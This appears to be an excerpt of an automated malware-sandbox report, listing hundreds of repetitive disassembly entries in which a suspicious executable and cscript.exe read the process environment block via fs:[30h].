          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B31DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B335A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B32581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B02D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BB8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BCFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B13D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BCE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B34D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B8A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B27D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B43D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B83540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B846A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B316E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B176E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B48EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BBFEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B336CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BBFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B38E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B17E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BCAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BCAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B18794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B87794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B437F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B04F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05453D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05493540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_054C3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05437D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_0543C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_0543C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_0541AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_054DE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05423D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_054E8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_0549A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05444D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05496DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05496DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_0542D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_0542D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_054DFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_054C8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05442581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_05412D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_0544FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_0544FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_054E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exe Code function: 6_2_054E05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054435A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05441DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054D14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05496CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054E070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054AFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05414F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0544E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054537F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05428794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05497794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_05427E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_054DAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0542766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0543AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 6_2_0541C600 mov eax, dword ptr fs:[00000030h]
